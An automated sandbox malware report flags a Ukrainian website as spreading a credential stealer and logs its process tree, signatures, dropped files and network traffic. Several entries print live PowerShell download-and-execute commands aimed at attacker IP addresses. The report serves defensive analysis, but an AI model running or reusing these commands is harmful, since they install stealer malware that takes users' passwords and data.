URL:

www.postcard-ua.com.ua

Full analysis: https://app.any.run/tasks/5b5b37d5-e3be-475b-9e15-eaf3d617159f
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: January 13, 2026, 18:01:15
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
python
arch-exec
arch-doc
susp-powershell
Indicators:
MD5:

154636D30863734AD07255E3960C6774

SHA1:

D4437FBF0BB8D6EA229FF92B71E45567FF529F4C

SHA256:

2AB4ACA0D988D606288A7E96B7D20E407F17F814DE8E6F4D57238487A20E253C

SSDEEP:

3:EgEX+QQ0n:Qfb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Use SyncAppvPublishingServer as a Powershell host to execute Powershell code

      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8924)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 8976)

    • Changes powershell execution policy (RemoteSigned)

      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8924)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 8924)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 9188)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 9188)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2600)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2568)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 9188)

    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 2252)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2568)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8924)
      • powershell.exe (PID: 8976)
      • powershell.exe (PID: 9188)

    • The process hide an interactive prompt from the user

      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8924)

    • Manipulates environment variables

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 8976)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 8396)
      • wscript.exe (PID: 8924)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 9188)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Starts process via Powershell

      • powershell.exe (PID: 8976)

    • Executes script without checking the security policy

      • powershell.exe (PID: 8976)
      • powershell.exe (PID: 9188)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 8976)
      • powershell.exe (PID: 9188)

    • Possible stealing from browsers

      • powershell.exe (PID: 9188)

    • Possible stealing of email data

      • powershell.exe (PID: 9188)

    • Possible stealing of messenger data

      • powershell.exe (PID: 9188)

    • Possible stealing of FTP data

      • powershell.exe (PID: 9188)

    • Possible stealing of cloud data

      • powershell.exe (PID: 9188)

    • Possible stealing from password managers

      • powershell.exe (PID: 9188)

    • Possible stealing from 2fa

      • powershell.exe (PID: 9188)

    • Found IP address in command line

      • powershell.exe (PID: 2600)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2568)

    • Possible stealing of VPN data

      • powershell.exe (PID: 9188)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 9188)

    • Probably download files using WebClient

      • powershell.exe (PID: 9188)

    • Application launched itself

      • powershell.exe (PID: 9188)

    • The process executes VB scripts

      • powershell.exe (PID: 8448)

    • Receives information about network interfaces and IP addresses (POWERSHELL)

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 2252)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2252)

    • Possible path obfuscation (POWERSHELL)

      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2252)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Process drops python dynamic module

      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2252)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Loads Python modules

      • AcPowerNotification.exe (PID: 7364)
      • AcPowerNotification.exe (PID: 6408)

    • Reads security settings of Internet Explorer

      • AcPowerNotification.exe (PID: 6408)
      • AcPowerNotification.exe (PID: 7364)

    • Connects to unusual port

      • AcPowerNotification.exe (PID: 6408)

  • INFO

    • Checks supported languages

      • TextInputHost.exe (PID: 8116)
      • AcPowerNotification.exe (PID: 7364)
      • AcPowerNotification.exe (PID: 6408)

    • Reads the computer name

      • TextInputHost.exe (PID: 8116)
      • AcPowerNotification.exe (PID: 6408)
      • AcPowerNotification.exe (PID: 7364)

    • Application launched itself

      • chrome.exe (PID: 7504)

    • Connects to unusual port

      • chrome.exe (PID: 7776)

    • Manual execution by a user

      • wscript.exe (PID: 8396)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 8976)
      • powershell.exe (PID: 2568)
      • powershell.exe (PID: 2600)

    • Disables trace logs

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 9188)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 2600)
      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2568)
      • AcPowerNotification.exe (PID: 7364)

    • Checks proxy server information

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 9188)
      • powershell.exe (PID: 2600)
      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 2568)
      • slui.exe (PID: 5732)
      • AcPowerNotification.exe (PID: 6408)
      • AcPowerNotification.exe (PID: 7364)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 8448)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 8448)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 9188)
      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)
      • powershell.exe (PID: 2568)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8448)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 2252)

    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 2600)

    • The sample compiled with english language support

      • powershell.exe (PID: 2252)
      • powershell.exe (PID: 6208)

    • Python executable

      • AcPowerNotification.exe (PID: 7364)
      • AcPowerNotification.exe (PID: 6408)

    • Reads Environment values

      • AcPowerNotification.exe (PID: 7364)

    • The executable file from the user directory is run by the Powershell process

      • AcPowerNotification.exe (PID: 7364)
      • AcPowerNotification.exe (PID: 6408)

    • Reads the machine GUID from the registry

      • AcPowerNotification.exe (PID: 7364)
      • AcPowerNotification.exe (PID: 6408)

    • Creates files or folders in the user directory

      • AcPowerNotification.exe (PID: 6408)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
183
Monitored processes
29
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs textinputhost.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs slui.exe chrome.exe no specs msedge.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe svchost.exe acpowernotification.exe acpowernotification.exe

Process information

PID
CMD
Path
Indicators
Parent process
2252powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://194.150.220.218/4SLEYpfAk57hGubo/ktkhzktujk')"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2292C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2568powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://138.124.66.23/pointyrelight')"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2600powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://194.150.220.21/4SLEYpfAk57hGubo/ciopoiwppdg')"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4636"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exepowershell.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
5732C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6208powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://194.150.220.218/4SLEYpfAk57hGubo/mnvqlprtyntv')"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6408"C:\Users\admin\AppData\Roaming\Portmaster\Updates\Local\25d75be7d8d07f40\AcPowerNotification.exe" "C:\Users\admin\AppData\Roaming\Portmaster\Updates\Local\25d75be7d8d07f40\ktkhzktujk"C:\Users\admin\AppData\Roaming\Portmaster\Updates\Local\25d75be7d8d07f40\AcPowerNotification.exe
powershell.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Version:
3.13.9
Modules
Images
c:\users\admin\appdata\roaming\portmaster\updates\local\25d75be7d8d07f40\acpowernotification.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\users\admin\appdata\roaming\portmaster\updates\local\25d75be7d8d07f40\vcruntime140.dll
c:\users\admin\appdata\roaming\portmaster\updates\local\25d75be7d8d07f40\python313.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
6892"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7236"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=5056,i,1806068039933233436,1033138846017262884,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4984 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
52 776
Read events
52 745
Write events
31
Delete events
0

Modification events

(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(9188) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
30
Suspicious files
34
Text files
76
Unknown types
1

Dropped files

PID
Process
Filename
Type
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old~RFfde70.TMP
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RFfde80.TMP
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RFfde80.TMP
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old~RFfde8f.TMP
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RFfde8f.TMP
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
7504chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
597
TCP/UDP connections
203
DNS requests
105
Threats
27

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7776
chrome.exe
GET
206
185.68.16.114:443
https://www.postcard-ua.com.ua/wp-content/uploads/2024/01/video_2024-01-15_18-58-31.mp4
unknown
unknown
7776
chrome.exe
GET
200
142.251.140.174:80
http://clients2.google.com/time/1/current?cup2key=8:D-ghwYfI2iK5H7SErClWTML9GlBiwmNUvdKlrBdaHyg&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
7776
chrome.exe
POST
200
64.233.167.84:443
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
unknown
text
17 b
whitelisted
7776
chrome.exe
GET
200
185.68.16.114:443
https://www.postcard-ua.com.ua/wp-content/litespeed/css/A.b9f4f942314b3d48054f31c5f5f07a99.css,qver=04c82.pagespeed.cf.qsLTYrEkYY.css
unknown
text
128 Kb
unknown
7776
chrome.exe
GET
200
172.217.20.138:443
https://safebrowsingohttpgateway.googleapis.com/v1/ohttp/hpkekeyconfig?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
unknown
binary
41 b
whitelisted
7776
chrome.exe
GET
200
185.68.16.114:443
https://www.postcard-ua.com.ua/
unknown
html
128 Kb
unknown
7776
chrome.exe
GET
200
185.68.16.114:443
https://www.postcard-ua.com.ua/wp-content/themes/woodmart/images/lazy.png.webp.pagespeed.ce.zaZh-vXmDi.webp
unknown
image
34 b
unknown
7776
chrome.exe
GET
200
142.251.141.104:443
https://www.googletagmanager.com/gtm.js?id=GTM-MF5Q32K9
unknown
text
128 Kb
unknown
7776
chrome.exe
GET
200
185.68.16.114:443
https://www.postcard-ua.com.ua/pagespeed_static/1.JiBnMqyl6S.gif
unknown
image
53 b
unknown
7776
chrome.exe
GET
200
142.251.141.104:443
https://www.googletagmanager.com/gtag/js?id=G-Q4TJ2HXFQW&cx=c&gtm=4e61c1h2
unknown
text
128 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
1156
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5636
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7776
chrome.exe
142.251.140.174:80
clients2.google.com
GOOGLE
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
7776
chrome.exe
172.217.20.138:443
safebrowsingohttpgateway.googleapis.com
GOOGLE
US
whitelisted
7776
chrome.exe
64.233.167.84:443
accounts.google.com
GOOGLE
US
whitelisted
7776
chrome.exe
185.68.16.114:443
www.postcard-ua.com.ua
UKRAINE-AS
UA
unknown
7776
chrome.exe
185.68.16.114:80
www.postcard-ua.com.ua
UKRAINE-AS
UA
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
  • 40.127.240.158
whitelisted
google.com
  • 142.250.185.206
whitelisted
clients2.google.com
  • 142.251.140.174
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 172.217.20.138
  • 142.250.184.202
  • 142.250.186.170
  • 142.251.141.106
  • 142.250.185.74
  • 142.251.141.74
  • 216.58.212.138
  • 216.58.206.42
  • 142.250.185.106
  • 142.250.184.234
  • 142.250.74.202
  • 172.217.18.10
  • 216.58.206.74
  • 142.251.208.10
  • 142.250.185.202
  • 142.250.185.138
whitelisted
www.postcard-ua.com.ua
  • 185.68.16.114
unknown
accounts.google.com
  • 64.233.167.84
whitelisted
client.wns.windows.com
  • 172.211.123.249
  • 172.211.123.250
whitelisted
stats.wp.com
  • 192.0.76.3
whitelisted
fonts.googleapis.com
  • 216.58.206.42
whitelisted
www.googletagmanager.com
  • 142.251.141.104
whitelisted

Threats

PID
Process
Class
Message
7776
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
7776
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
7776
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in TLS SNI (bsc-testnet .drpc .org)
7776
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (data-seed-prebsc-1-s1 .bnbchain .org)
7776
chrome.exe
Misc activity
ET INFO Observed Smart Chain Domain in TLS SNI (data-seed-prebsc-1-s1 .bnbchain .org)
7776
chrome.exe
Misc activity
ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)
7776
chrome.exe
Misc activity
ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)
7776
chrome.exe
Misc activity
ET INFO Observed External IP Lookup Domain (ip-info .ff .avast .com) in TLS SNI
2292
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Requests to a free CDN for open source projects (jsdelivr .net)
8448
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
www.postcard-ua.com.ua